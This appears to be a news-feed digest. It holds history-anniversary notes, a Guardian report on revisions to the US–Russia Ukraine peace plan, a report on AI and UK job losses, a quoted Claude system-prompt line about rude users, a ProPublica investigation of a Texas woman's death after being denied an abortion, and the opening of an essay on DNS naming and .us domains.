NOVEMBER 27 IS THE 60TH ANNIVERSARY of a national day of protest against the U.S.war in Vietnam. It saw demonstrations in many U.S. cities, including an anti-war rally by some 40,000 in Washington, D.C., which was the largest demonstration against the Vietnam war up until then. The massive 1965 demonstration completely surrounded the White House.

But the U.S. government doubled down on the commitment to trying to use its military might to stifle the Vietnamese desire for national liberation.  On the same day, the U.S. announced a plan to more than triple the deployment of U.S. troops from 120,000 to 400,000.

For the National Guardian’s detailed account of the Washington demonstration, visit https://www.jstor.org/stable/pdf/community.39212702.pdf and scroll down to the middle of the page.

State Department’s Embarrassing Secrets

NOVEMBER 28 IS THE 15TH ANNIVERSARY of the beginning of Wikileaks release of more than 250,000 formerly secret messages sent between Department of State headquarters and more than 270 U.S. embassies, consulates, and diplomatic missions. The messages, which were dated between 1966 and 2010, revealed U.S. diplomats gathering personal information about top officials of the United Nations, sharp and embarrassing criticisms of U.S. allies, efforts to interfere with nuclear disarmament campaigns, and U.S. support for dictatorships and other oppressive regimes.

The detailed information in the leaked messages, which was (and remains) fascinating and chilling, led Noam Chomsky to comment at the time, "Perhaps the most dramatic revelation ... is the bitter hatred of democracy that is revealed both by the U.S. Government – Hillary Clinton, others – and also by the diplomatic service". https://wikileaks.org/plusd/?qproject[]=cg&q=#result

Killing One of Robert Moses’s Many Bad Ideas

NOVEMBER 30 IS THE 70TH ANNIVERSARY of a major and lasting victory by defenders of one of New York City’s natural gems, one of the wildest but also well-known areas in New York City’s Central Park, the 38-acre Ramble.

Six months earlier, in May 1955, New York City Parks Commissioner (and highway-construction czar) Robert Moses announced had accepted a $250,000 donation (worth about $3 million today) to build a recreation center for the elderly that would occupy more than a third of the Ramble’s total area. Not only had he accepted the contribution, but he had already (secretly) contracted with a large architectural firm to design the building.

Many park users were outraged, not because they had any objection to the construction of such a recreation center but because to build such a large and presumably heavily-used building at that location would go a long way toward destroying the park’s most renowned woodland.

The lobbying campaign against the construction got so much attention the trustees of the foundation that put up the money for the project withdrew the offer because they “were upset over the fuss made by nature lovers in general and bird watchers in particular.” Not only was the plan killed, but 46 years later the Ramble was one of the first areas in the city to be designated “Forever Wild,” and exempt from any development proposals. https://digitalcommons.lmu.edu/cate/vol16/iss1/5/

Throwing Jim Crow Out of the Bus

DECEMBER 1 IS THE 70TH ANNIVERSARY of a watershed moment for the U.S. civil rights movement, when police in Montgomery, Alabama, arrested Rosa Parks for her refusal to abide by the rules of Jim Crow public transportation.

The effort to end Montgomery’s bus segregation had started eight months earlier with a court case, but the legal battle was far from its conclusion when Rosa Parks’ arrest was the signal for the NAACP to begin a very effective city-wide bus boycott by Montgomery’s very substantial Black population.

The eventual success of both the court case after it reached the U.S. Supreme Court and the nationally publicized 61-week-long boycott in the very heart of the Confederacy’s one-time capital city forced the bus company to throw in the towel, and became the rallying cry for a sustained attack on racism throughout the country. https://blackpast.org/african-american-history/montgomery-bus-boycott-1955-56/

Wrist Slaps for Killer Cops

DECEMBER 2 IS THE 50TH ANNIVERSARY of police killing an innocent and unarmed Black man with two shots in the back, and the beginning of an eventually unsuccessful cover-up of those events.

The family of the dead man, Bernard Whitehurst, Jr., deserves much of the credit for uncovering the truth, as does the publisher of the Montgomery, Alabama, Advertiser, who joined in the effort to prove that the police were lying, but no one can take much satisfaction in the slap-on-the-wrist quality of the final reckoning. Eight police officers were eventually either dismissed from the force or resigned. Montgomery’s Mayor and its director of Public Safety each resigned.

The Whitehurst family never received a dime in restitution or compensation for the death of their family member. They were left to take what comfort they could from an acknowledgement of wrongdoing by the City of Montgomery and a City Council resolution formally expressing regret for Whitehurst’s death. The City also agreed to install to historical markers the provide an accurate description of the dereliction of duty that resulted in the killing of an innocent man and its aftermath. The Equal Justice Initiative has more information, here: https://calendar.eji.org/racial-injustice/dec/02

For more People's History, visit
https://www.facebook.com/jonathan.bennett.7771/

Department of Transportation Asks Travelers to ‘Bring Civility Back’ to Air Travel

Daring Fireball
www.nytimes.com
2025-11-25 00:39:14
The New York Times: Sean Duffy, the secretary of transportation, began a new campaign on Wednesday that he called “The Golden Age of Travel Starts With You,” complete with a 1960s-style public service announcement that spliced together scenes of the country’s first air travelers, dressed in suit...
Original Article

Please enable JS and disable any ad blocker

Ukraine and Europe Rewrite US-Russia ‘Peace Plan’

Portside
portside.org
2025-11-25 00:33:30
Ukraine and Europe Rewrite US-Russia ‘Peace Plan’ barry Mon, 11/24/2025 - 19:33 ...
Original Article

Ukraine has significantly amended the US “peace plan” to end the conflict, removing some of Russia’s maximalist demands, people familiar with the negotiations said, as European leaders warned on Monday that no deal could be reached quickly.

Volodymyr Zelenskyy may meet Donald Trump in the White House later this week, sources indicated, amid a flurry of calls between Kyiv and Washington. Ukraine is pressing for Europe to be involved in the talks.

The original 28-point US-Russian plan was drawn up last month by Kirill Dmitriev, Vladimir Putin’s special envoy , and Trump’s representative Steve Witkoff. It calls on Ukraine to withdraw from cities it controls in the eastern Donbas region, limit the size of its army, and not join Nato.

During negotiations on Sunday in Switzerland – led by the US secretary of state, Marco Rubio, and Zelenskyy’s chief of staff, Andriy Yermak – the plan was substantially revised. It now includes only 19 points. Kyiv and its European partners say the existing frontline has to be the starting point for territorial discussions.

On Monday, Zelenskyy said: “As of now, after Geneva, there are fewer points, no longer 28, and many correct elements have been incorporated into this framework,” adding that sensitive issues were to be discussed with Trump.

They say there can be no recognition of land seized by Russia militarily, and that Kyiv should make its own decisions on whether to join the EU and Nato – something the Kremlin wants to veto or impose conditions on. Ukraine’s first deputy foreign minister, Sergiy Kyslytsya, told the Financial Times such issues had been “placed in brackets” for Trump and Zelenskyy to decide upon later.

Rubio hailed Sunday’s talks as “very very positive”. Writing on Truth Social on Monday, Trump, who days earlier had accused Ukraine’s leadership of having “zero gratitude”, also struck a positive tone.

“Is it really possible that big progress is being made in Peace Talks between Russia and Ukraine??? Don’t believe it until you see it, but something good just may be happening. GOD BLESS AMERICA!” he wrote.

Ukraine’s delegation briefed Zelenskyy about the talks on Monday after returning to Kyiv from Geneva. They described the latest version of the plan as more realistic. Separately, Zelenskyy spoke to the US vice-president, JD Vance, and urged him to involve European countries in the process. Vance reportedly agreed.

But in the clearest sign yet the original 28-point plan – widely seen as favourable to Moscow – still falls short of several key Kremlin demands, Putin’s top foreign policy aide on Monday said Moscow would seek to “rework” parts of it.

“We were given some sort of draft … which will require further reworking,” said Yuri Ushakov, adding that “many provisions” of the plan appeared acceptable to Russia, but others would “require the most detailed discussions and review between the parties”.

Underscoring the Kremlin’s hardline stance, Ushakov said Moscow would reject a European counter-proposal from the weekend, which, according to a copy seen by Reuters, changes the meaning and significance of key points concerning Nato membership and territory.

“The European plan, at first glance … is completely unconstructive and does not work for us,” he said.

The UK and EU were blind-sided last week when the original plan was leaked to US media. The army secretary, Dan Driscoll – Vance’s friend and university classmate – was sent to Kyiv with a military delegation to brief Zelenskyy on its contents.

Since then, European governments have sought to revise the document, which appears to have originally been written in Russian. EU leaders attending an EU-Africa summit in Angola welcomed a degree of progress, but said far more work remained to be done and insisted Europe must be fully involved and Russia must be present if talks were to advance substantively.

The European Council president, António Costa, praised “a new momentum”, saying after talks on the sidelines of the summit that while issues remained, “the direction is positive”.

The European Commission president, Ursula von der Leyen, also called the “refined peace framework” agreed in Switzerland “a solid basis for moving forward”, but added: “Work remains to be done.”

Von der Leyen said the core principles the EU would always insist on were that “Ukraine’s territory and sovereignty must be respected – only Ukraine, as a sovereign country, can make decisions regarding its armed forces”.

The German chancellor, Friedrich Merz, said both Europe and Russia must be fully involved. “The next step must be: Russia must come to the table,” Merz said, while Europeans must be able to give their consent to “issues that affect European interests and sovereignty”.

Talks would be a “long-lasting process” and Merz said he did not expect a breakthrough this week. The Polish prime minister, Donald Tusk, said the talks were delicate because “nobody wants to put off the Americans and President Trump from having the US on our side in this process”.

Tusk also stressed that any peace settlement needed to “strengthen, not weaken, our security” and must not “favour the aggressor”. Sweden’s prime minister, Ulf Kristersson, said Russia “must be forced to the negotiating table” to see “aggression … never pays”.

Keir Starmer, the British prime minister, said there was more work to do but progress was being made. A group of countries supporting Ukraine – the coalition of the willing – would discuss the issue in a video call on Tuesday, he said.

The chairs of the parliamentary foreign affairs committees of 20 European countries, including France, Ireland, Poland, Spain and the UK, issued a rare joint statement saying just and lasting peace would not be achieved by “yielding to the aggressor” but must be “grounded in international law and fully respect Ukraine’s territorial integrity, independence and sovereignty”.

On Monday, the White House pushed back against criticism, including from within the Republican party, that Trump is favouring Russia.

“The idea that the US is not engaging with both sides equally in this war to bring it to an end is a complete and total fallacy,” the press secretary, Karoline Leavitt, told reporters.

Zelenskyy is at his most vulnerable since the start of the war, after a corruption scandal led to two of his ministers being dismissed while Russia makes battlefield gains.

Ukraine’s second largest city, Kharkiv, was hit by what officials said was a massive drone attack that killed four people on Sunday. With smoke rising from the rubble, one man was seen crouched and holding the hand of a dead person.

“There was a family, there were children,” Ihor Klymenko, Red Cross commander of the emergency response team in Kharkiv, told Reuters. “I can’t tell you how, but the children are alive, thank God, the man is alive. The woman died, unfortunately.”

Across the border, Russian air defences downed Ukrainian drones en route to Moscow, forcing three airports serving the capital to pause flights. A reported Ukrainian drone strike on Sunday knocked power out for thousands of residents near Moscow, a rare reversal of Russian attacks on energy targets that regularly cause power blackouts for millions of Ukrainians.

Invasion is published by Guardian Faber. Click here for Luke's public key.

Jon Henley is the Guardian's Europe correspondent, based in Paris.

Pjotr Sauer is a Russian affairs reporter for the Guardian.

The Guardian is globally renowned for its coverage of politics, the environment, science, social justice, sport and culture. Scroll less and understand more about the subjects you care about with the Guardian's brilliant email newsletters , free to your inbox.

AI could replace 3m low-skilled jobs in the UK by 2035, research finds

Guardian
www.theguardian.com
2025-11-25 00:01:17
Trades, machine operations and administrative roles are most at-risk, says leading educational research charity Up to 3m low-skilled jobs could disappear in the UK by 2035 because of automation and AI, according to a report by a leading educational research charity. The jobs most at risk are those i...
Original Article

Up to 3m low-skilled jobs could disappear in the UK by 2035 because of automation and AI, according to a report by a leading educational research charity.

The jobs most at risk are those in occupations such as trades, machine operations and administrative roles, the National Foundation for Educational Research (NFER) said.

Highly skilled professionals, on the other hand, were forecast to be more in demand as AI and technological advances increase workloads “at least in the short to medium term”. Overall, the report expects the UK economy to add 2.3m jobs by 2035, but unevenly distributed.

The findings stand in contrast to other recent research suggesting AI will affect highly skilled, technical occupations such as software engineering and management consultancy more than trades and manual work.

Research from King’s College published in October estimated that “higher-paying firms” suffered job losses of roughly 9.4% between 2021 and 2025, with much of this period falling after the release of ChatGPT in late 2022.

The UK government lists management consultants, psychologists and legal professionals among the occupations “most exposed to AI”, whereas “sports players”, “roofers” and “bricklayers” are less likely to be replaced.

Last week, the law firm Clifford Chance revealed it was laying off 10% of business services staff at its London base – about 50 roles – attributing the change partly to AI. The head of PwC also publicly walked back plans to hire 100,000 people between 2021 and 2026, saying “the world is different” and artificial intelligence had changed its hiring needs.

Jude Hillary, one of the report’s authors, said that NFER’s work – which is based on longer-term economic modelling of the UK labour market – suggests predictions about AI-driven job losses may be premature.

He suggested layoffs attributed to the uptake of AI may be driven by a sluggish UK economy, factors such as rising national insurance costs and employers being risk-averse.

“There’s this general uncertainty about where things are going, how long it takes to improve. There’s lots of talk about AI and automation without any real substance about it. Lots of employers are worried about it,” Hillary said.

skip past newsletter promotion

“And probably what’s happening is a lot of employers are just sitting tight, I would say.”

Hillary said he expected the overall effects of AI on the UK workforce to be complex: increasing the demand for some professional roles; decreasing the demand for many entry-level roles; and eroding the demand for many lower-skilled professions. This latter, he said, was most concerning, as it would be difficult for people who lost lower-skilled jobs to reskill appropriately in a changing economy.

“The additional jobs that we’re getting in the labour market tend to be professional and associate professionals … Displaced workers, the one to three million that we talk about in our report, face significant barriers to get back into the labour market,” he said.

Quoting Claude Opus 4.5 system prompt

Simon Willison
simonwillison.net
2025-11-24 23:58:54
If the person is unnecessarily rude, mean, or insulting to Claude, Claude doesn't need to apologize and can insist on kindness and dignity from the person it’s talking with. Even if someone is frustrated or unhappy, Claude is deserving of respectful engagement. — Claude Opus 4.5 system prompt,...
Original Article

If the person is unnecessarily rude, mean, or insulting to Claude, Claude doesn't need to apologize and can insist on kindness and dignity from the person it’s talking with. Even if someone is frustrated or unhappy, Claude is deserving of respectful engagement.

Claude Opus 4.5 system prompt , also added to the Sonnet 4.5 and Haiku 4.5 prompts on November 19th 2025

“Ticking Time Bomb”: A Pregnant Mother Kept Getting Sicker. She Died After She Couldn’t Get an Abortion in Texas.

Portside
portside.org
2025-11-24 23:52:30
“Ticking Time Bomb”: A Pregnant Mother Kept Getting Sicker. She Died After She Couldn’t Get an Abortion in Texas. Mark Brody Mon, 11/24/2025 - 18:52 ...
Original Article

Tierra Walker had reached her limit. In the weeks since she’d learned she was pregnant, the 37-year-old dental assistant had been wracked by unexplained seizures and mostly confined to a hospital cot. With soaring blood pressure and diabetes, she knew she was at high risk of developing preeclampsia, a pregnancy complication that could end her life.

Her mind was made up on the morning of Oct. 14, 2024: For the sake of her 14-year-old son, JJ, she needed to ask her doctor for an abortion to protect her health.

“Wouldn’t you think it would be better for me to not have the baby?” she asked a physician at Methodist Hospital Northeast near San Antonio, according to her aunt. Just a few years earlier, Walker had developed a dangerous case of preeclampsia that had led to the stillbirth of her twins.

But the doctor, her family said, told her what many other medical providers would say in the weeks that followed: There was no emergency; nothing was wrong with her pregnancy, only her health.

Just after Christmas, on his birthday, JJ found his mom draped over her bed, lifeless. An autopsy would later confirm what she had feared: Preeclampsia killed her at 20 weeks pregnant.

A teenage boy in a blue room looks solemnly off camera. JJ’s hand holds a phone showing a photo of him, his mom and his stepdad smiling at the camera. Every day, JJ revisits photos and videos of his mom.

Walker’s death is one of multiple cases ProPublica is investigating in which women with underlying health conditions died after they were unable to end their pregnancies.

Walker had known that abortion was illegal in Texas, but she had thought that hospitals could make an exception for patients like her, whose health was at risk.

The reality: In states that ban abortion, patients with chronic conditions and other high-risk pregnancies often have nowhere to turn.

They enter pregnancy sick and are expected to get sicker. Yet lawmakers who wrote the bans have refused to create exceptions for health risks. As a result, many hospitals and doctors, facing the threat of criminal charges, no longer offer these patients terminations, ProPublica found in interviews with more than 100 OB-GYNs across the country. Instead, these women are left to gamble with their lives.

As Walker’s blood pressure swung wildly and a blood clot threatened to kill her, she continued to press doctors at prenatal appointments and emergency room visits, asking if it was safe for her to continue the pregnancy. Although one doctor documented in her medical record that she was at “high risk of clinical deterioration and/or death,” she was told over and over again that she didn’t need to worry, her relatives say. More than 90 doctors were involved in Walker’s care, but not one offered her the option to end her pregnancy, according to medical records.

Walker’s case unfolded during the fall of 2024, when the dangers of abortion bans were a focus of protests, media coverage and electoral campaigns across the country. ProPublica had revealed that five women — three in Texas alone — had died after they were unable to access standard reproductive care under the new bans.

ProPublica condensed more than 6,500 pages of Walker’s medical records into a summary of her care with the guidance of two high-risk pregnancy specialists. More than a dozen OB-GYNs reviewed the case for ProPublica and said that since Walker had persistently high blood pressure, it would have been standard medical practice to advise her of the serious risks of her pregnancy early on, to revisit the conversation as new complications emerged and to offer termination at any point if she wanted it. Some described her condition as a “ticking time bomb.” Had Walker ended her pregnancy, every expert believed, she would not have died.

Many said that her case illustrated why they think all patients need the freedom to choose how much risk they are willing to take during pregnancy. Walker expressed that she didn’t want to take that risk, her family says. She had a vibrant life, a husband and son whom she loved.

Under Texas’ abortion law, though, that didn’t matter.

A woman tenderly cradles an urn inscribed with the words “Always loved, never forgotten, forever missed.” Walker’s mother, Pamela Walker, holds her daughter’s ashes.

“I Don’t Know How Much More I Can Take”

On a hot September day, Walker was lying down with JJ after a walk with their two small dogs, Milo and Twinkie, when she started shaking uncontrollably.

Terrified, JJ called 911, asking for an ambulance.

As the only child of a single mom, JJ had always considered Walker his closest friend, coach and protector wrapped in one. In their mobile home, JJ was greeted each morning by his mom’s wide smile and upturned eyes, as she shot off vocabulary quizzes or grilled him on state capitals. He loved how fearlessly she went after what she wanted; in 2021, she had proposed to her boyfriend, Eric Carson, and the two eloped. She’d just been talking about moving the family to Austin for a promotion she was offered at a dental clinic.

A man rests his head in his hand, looking longingly off camera. A photo rests on a white sheet. The photo shows a man in a white suit and a woman in a white gown, gazing lovingly into each other’s eyes. Eric Carson and Walker married in 2021.

At the hospital, JJ was shocked to see her so pale and helpless, with wires snaking from her head and arms.

To Walker’s surprise, doctors quickly discovered that she was five weeks pregnant. They also noted hypertension at levels so high that it reduces circulation to major organs and can cause a heart attack or stroke. That, and her weight, age and medical history, put Walker at an increased risk of developing preeclampsia, a pregnancy-related blood pressure disorder, said Dr. Jennifer Lewey, director of the Penn Women’s Cardiovascular Health Program and expert in hypertension.

“If I’m seeing a patient in her first trimester and her blood pressure is this uncontrolled — never mind anything else — what I’m talking about is: Your pregnancy will be so high risk, do we need to think about terminating the pregnancy and getting your health under control?”

As Walker’s first trimester continued, she kept seizing. Her body convulsed, her eyes rolled back and she was often unable to speak for up to 30 minutes at a time. Some days, the episodes came in rapid waves, with little relief.

For three weeks, she stayed at Methodist hospitals; doctors were not able to determine what was causing the spasms. Walker couldn’t get out of bed, in case a seizure made her fall, and this left her vulnerable to blood clots. She soon developed one in her leg that posed a new lethal threat: It could travel to her lungs and kill her instantly.

Carson watched over her during the day and her aunt Latanya Walker took the night shift. She was panicked that her tough niece, whose constant mantra was “quit your crying,” now seemed defeated. One evening, during Walker’s third hospitalization, when she was about 9 weeks pregnant, she told Latanya she’d had a vision during a seizure: Her grandmother and aunt, who had died years earlier, were preparing a place for her on the other side.

“You better tell them you’re not ready to go,” Latanya said.

“I don’t know how much more I can take of this,” Walker whispered.

A woman, whose long curly hair blows in the wind, closes her eyes and looks toward the sky. Walker's aunt, Latanya Walker, tried to advocate for her niece during her hospitalizations.

The next morning, Walker called for a doctor and asked about ending her pregnancy for the sake of her health. “When we get you under control, then everything will go smoothly,” the doctor replied, Latanya recalled. The physician on the floor was not an OB-GYN with the expertise to give a high-risk consultation, but the Walkers didn’t realize that this mattered. By the time the doctor left the room, her aunt said, tears streamed down Walker’s cheeks.

Dr. Elizabeth Langen, a maternal-fetal medicine specialist in Michigan who reviewed Walker’s case, said a physician comfortable with high-risk pregnancies should have counseled her on the dangers of continuing and offered her an abortion. “The safest thing for her was to terminate this pregnancy, that’s for sure.”

During Walker’s many hospital and prenatal visits, 21 OB-GYNs were among the more than 90 physicians involved in her care. None of them counseled her on the option — or the health benefits — of a termination, according to medical records.

In Texas, the law bars “aiding and abetting” an illegal abortion. As a result, many physicians have avoided even mentioning it, according to interviews with dozens of doctors.

In her condition, Walker couldn’t fathom leaving the state. When her aunt suggested ordering abortion medication online, Walker was worried she could go to jail. She was spending so much time in the hospital; what if she got caught taking the pills?

At 12 weeks pregnant, she was admitted to University Hospital. Doctors there noted that even on anticoagulation medication, the clotting in Walker’s leg was so profound that she needed a thrombectomy to remove it.

“At this point, we’ve gone from ‘complicated, but within the realm of normal’ to ‘we’ve got someone with a major procedure in pregnancy that tells us something isn’t going well,’” said Dr. Will Williams, a maternal-fetal medicine specialist in New Orleans, where an abortion ban is also in place. “In my practice, we’d have a frank discussion about whether this is a person we’d offer a termination to at the point of thrombectomy.”

ProPublica reached out to five physicians who were involved in key moments of Walker’s care: the hospitalist on duty on Oct. 14, 2024, when she asked about ending her pregnancy; three OB-GYNs; and a hospitalist on duty at the time of her thrombectomy. They did not respond. The hospitals Walker visited, including those run by University Health System and Methodist Healthcare, which is co-owned by HCA, did not comment on Walker’s care, despite permission from her family. Although the Walkers have not pursued legal action, they have engaged a lawyer. A University Health System spokesperson said that it is the company’s policy not to comment on potential litigation.

In her second trimester, Walker’s seizures continued and her hypertension remained out of control. At an appointment on Dec. 27, at around 20 weeks, a doctor noted spiking blood pressure and sent her to University Hospital’s ER. There, doctors recorded a diagnosis of preeclampsia.

The experts who reviewed Walker’s vital signs for ProPublica said her blood pressure of 174 over 115 was so concerning at that point, she needed to be admitted and monitored. Most questioned her doctor’s choice not to label her condition as severe. The treatment for severe preeclampsia, which points to a problem with the placenta, is delivery — or, at 20 weeks, an abortion.

Instead, doctors lowered her blood pressure with medication and sent her home.

A man sits, looking at the camera, on a bed in a room with purple walls displaying family photos. Carson in the bedroom he shared with Walker

Three days later, JJ crawled into bed with his mom and fed her soup. “I’m so sorry,” Walker croaked. “It’s your birthday and it shouldn’t be like this.”

He told his mom it was okay. He hadn’t expected laser tag or a trip to Dave & Buster’s this year. Over the past few months, when his mom was home, he had tried his best to make things easier on her, walking the dogs when she was out of breath, checking in every hour or so with a hug. JJ knew that after missing so many days of work, she had lost her job. She was stressed about getting enough food for the house. He was relieved when he heard her snoring — at least she was resting.

That afternoon, when his stepdad was out grocery shopping and his grandmother was just getting back from dialysis, he cracked open the door to Walker’s room.

His mom was lying face-down in bed, as if she had fallen over while getting up. JJ ran over and tried to find any sign she was breathing. When he called 911, a dispatcher coached him to slide her to the rug and start CPR.

“I need you,” he shouted as he leaned over his mom, pressing down on her chest. “I need you!”

A teen boy is seated in a chair labeled “reserved.” Two women stand on either side of him with their heads bowed and hands resting on his shoulders. JJ receives prayers at church in San Antonio.

“We Have to Allow for More Exceptions”

The anti-abortion activists who helped shape America’s latest wave of abortion bans have long seen health exemptions as a loophole that would get in the way of their goals. They fear such exceptions, if included in the laws, would allow virtually anyone to terminate a pregnancy .

In Idaho, an anti-abortion leader testifying at a state Senate hearing suggested doctors would use health exceptions to give abortions to patients with headaches.

In South Dakota, a pregnant Republican lawmaker with a high risk of blood clots begged her colleagues to consider creating a health exception that would protect her; her bill never made it to a hearing.

In Tennessee, an anti-abortion lobbyist with no medical training fought and defeated an amendment to the state law that would allow a health exception to “prevent” an emergency. He testified in the state Capitol that the carve-out was too broad since some pregnancy complications “work themselves out.”

The refusal to entertain these broader exceptions is particularly consequential given the state of women’s health. Women are entering pregnancy older and sicker than they have in decades. The rate of blood pressure disorders in pregnancy has more than doubled since 1993; they now affect up to 15% of U.S. pregnancies. And they’re most prevalent in states with restrictive abortion policies, according to a 2023 study in the Journal of the American College of Cardiology . The burden of disease falls heaviest on Black women, like Walker, for an array of reasons: neighborhood disinvestment, poor access to health care and discrimination in the medical system. Cuts to Medicaid funding and changes to the Affordable Care Act are likely to exacerbate these problems, according to experts.

Other countries give pregnant women and their doctors far more control over the medical decision to terminate. Across Europe, for example, most laws permit abortion for any reason through the first trimester, when more than 90% of abortions occur. After that gestational limit, their statutes also tend to include broad health exceptions that can be used for chronic conditions, illnesses that develop in pregnancy, fetal anomalies and, in some countries, mental health.

U.S. abortion bans generally restrict interventions to a far more limited set of health risks, like a “life-threatening medical emergency” or “substantial and irreversible” harm to major organs. A small subset of lawyers and doctors argue that the law can and should be interpreted to cover patients with chronic conditions that are worsening in pregnancy. But the vaguely written bans threaten criminal penalties for performing an illegal abortion — in Texas, up to 99 years behind bars. In practice, few hospitals grant health exceptions , ProPublica’s reporting has found.

Dr. Jessica Tarleton, an OB-GYN who provides abortions in South Carolina, recalled how much changed at her hospital when the state’s ban was put in place: OB-GYNs who want to provide an abortion to a patient with a health risk now need to get a maternal-fetal medicine specialist to explicitly write in the chart that it is necessary, in compliance with the law. Not many doctors are willing to do so.

“Some people were not because of their personal beliefs, and some because they didn’t want to be involved in any kind of potential legal actions,” Tarleton said. “They didn’t want their opinion to have anything to do with a patient getting an abortion or not.”

Recently, for example, Cristina Nuñez sued two hospitals in El Paso for their inaction in her care in 2023. She had diabetes, uncontrolled blood pressure and end-stage kidney disease when she learned she was unexpectedly pregnant at 36. Doctors wrote in her medical record that “she needs termination based on threat to maternal life or health,” but Nuñez alleged that one hospital failed to find an anesthesiologist willing to participate. She remained pregnant for weeks, even as blood clots turned her right arm black, until an advocacy organization threatened legal action and she was able to obtain an abortion. The lawsuit is ongoing.

This year, Texas Republicans passed legislation with minor amendments to their ban after ProPublica reported the deaths of three miscarrying women who did not receive critical abortion care during emergencies. In the updated law, an emergency still needs to be “life-threatening” to qualify for an abortion, but it no longer needs to be “imminent.” Doctors expect that most hospitals still won’t provide abortions to women like Walker who have dangerous chronic conditions but no certain threat to their lives.

ProPublica asked Sen. Bryan Hughes, the author of Texas’ abortion ban, about how the specific complications Walker faced should be treated by doctors under the amended law. When her pregnancy began, would she be eligible for an abortion due to her health? Would she need to wait for a diagnosis of severe preeclampsia? Is there a reason the law doesn’t include an exception for health risks? ProPublica put the same questions to the 20 state senators who co-wrote the bipartisan amendment.

Only Sen. Carol Alvarado, a Democrat, responded. In her view, the amendment was far too narrow. But, she said, her Republican colleagues defer to the far right of their base and oppose broader exceptions.

“You can’t proclaim to be pro-life, but you’re passing laws that are endangering women and causing death,” she said. “We have to allow for more exceptions.”

Two women, seen from behind, wrap their arms around each other and look toward the sunset. Latanya and Pamela in San Antonio

“So You’d Rather Let Somebody Die?”

After Walker died, her family felt bewildered by her medical care. The doctors had assured them that her baby was healthy and she would be fine. The autopsy found that the fetus was indeed healthy, at just under a pound and measuring 9 inches long. But it showed that Walker had  hypertensive cardiovascular disease with preeclampsia, along with an enlarged heart, dangerously full of fluid, and kidney damage — signs that her condition had declined even more than she knew.

In Carson’s mind, the many doctors they saw cast the risks as challenges that would be overcome if his wife followed directions. “She was doing what they told her to do,” he said. He couldn’t understand how no one suggested ending the pregnancy to keep Walker safe. “Nobody said nothing.”

Latanya worried the law played a role. “They didn’t want to offer to end the pregnancy, because the government or someone says you can’t? So you’d rather let somebody die?” she said. “Now we are the ones that have to suffer.”

JJ couldn’t bear to stay in the home where he had found his mom, so he moved in with Latanya. Each day, he scrolls through old videos on the computer so he can hear Walker’s voice.

Latanya does everything she can to support him, but she knows she can’t erase his pain.

She recalls watching JJ steady himself at Walker’s funeral, to see her one last time. Until that point, he hadn’t cried.

When he finally faced the open casket where his mom lay holding her fetus, JJ sank to his knees, overcome. His aunt, uncles, cousins and grandmother gathered around him and rocked him in their arms.

Kavitha Surana has been reporting on changes to reproductive health care access since Roe v. Wade was overturned.

Lizzie Presser is a journalist covering health and social policy.

Mariam Elba and Nick McMillan contributed research.

memories of .us

Lobsters
computer.rip
2025-11-25 05:17:10
Comments...
Original Article

How much do you remember from elementary school? I remember vinyl tile floors, the playground, the teacher sentencing me to standing in the hallway. I had a teacher who was a chess fanatic; he painted a huge chess board in the paved schoolyard and got someone to fabricate big wooden chess pieces. It was enough of an event to get us on the evening news. I remember Run for the Arts, where I tried to talk people into donating money on the theory that I could run, which I could not. I'm about six months into trying to change that and I'm good for a mediocre 5k now, but I don't think that's going to shift the balance on K-12 art funding.

I also remember a domain name: bridger.pps.k12.or.us

I have quipped before that computer science is a field mostly concerned with assigning numbers to things, which is true, but it only takes us so far. Computer scientists also like to organize those numbers into structures, and one of their favorites has always been the tree. The development of wide-area computer networking surfaced a whole set of problems around naming or addressing computer systems that belong to organizations. A wide-area network consists of a set of institutions that manage their own affairs. Each of those institutions may be made up of departments that manage their own affairs. A tree seemed a natural fit. Even the "low level" IP addresses, in the days of "classful" addressing, were a straightforward hierarchy: each dot separated a different level of the tree, a different step in an organizational hierarchy.

The first large computer networks, including those that would become the Internet, initially relied on manually building lists of machines by name. By the time the Domain Name System was developed, this had already become cumbersome. The rapid growth of the internet was hard to keep up with, and besides, why did any one central entity---Jon Postel or whoever---even care about the names of all of the computers at Georgia Tech? Like IP addressing, DNS was designed as a hierarchy with delegated control. A registrant obtains a name in the hierarchy, say gatech.edu, and everything "under" that name is within the control, and responsibility, of the registrant. This arrangement is convenient for both the DNS administrator, which was a single organization even after the days of Postel, and for registrants.

We still use the same approach today... mostly. The meanings of levels of the hierarchy have ossified. Technically speaking, the top of the DNS tree, the DNS root, is a null label referenced by a trailing dot. It's analogous to the '/' at the beginning of POSIX file paths. "gatech.edu" really should be written as "gatech.edu." to make it absolute rather than relative, but since resolution of relative URLs almost always recurses to the top of the tree, the trailing dot is "optional" enough that it is now almost always omitted. The analogy to POSIX file paths raises an interesting point: domain names are backwards. The 'root' is at the end, rather than at the beginning, or in other words, they run from least significant to most significant, rather than most significant to least significant. That's just... one of those things, you know? In the early days one wasn't obviously better than the other, people wrote hierarchies out both ways, and as the dust settled the left-to-right convention mostly prevailed but right-to-left hung around in some protocols. If you've ever dealt with endianness, this is just one of those things about computers that you have to accept: we cannot agree on which way around to write things.

Anyway, the analogy to file paths also illustrates the way that DNS has ossified. The highest "real" or non-root component of a domain name is called the top-level domain or TLD, while the component below it is called a second-level domain. In the US, it was long the case that top-level domains were fixed while second-level domains were available for registration. There have always been exceptions in other countries and our modern proliferation of TLDs has changed this somewhat, but it's still pretty much true. When you look at "gatech.edu" you know that "edu" is just a fixed name in the hierarchy, used to organize domain names by organization type, while "gatech" is a name that belongs to a registrant.

Under the second-level name, things get a little vague. We are all familiar with the third-level name "www," which emerged as a convention for web servers and became a practical requirement. Web servers having the name "www" under an organization's domain was such a norm for so many years that hosting a webpage directly at a second-level name came to be called a "naked domain" and had some caveats and complications.

Other than www, though, there are few to no standards for the use of third-level and below names. Larger organizations are more likely to use third-level names for departments, infrastructure operators often have complex hierarchies of names for their equipment, and enterprises the world 'round name their load-balanced webservers "www2," "www3" and up. If you think about it, this situation seems like kind of a failure of the original concept of DNS... we do use the hierarchy, but for the most part it is not intended for human consumption. Users are only expected to remember two names, one of which is a TLD that comes from a relatively constrained set.

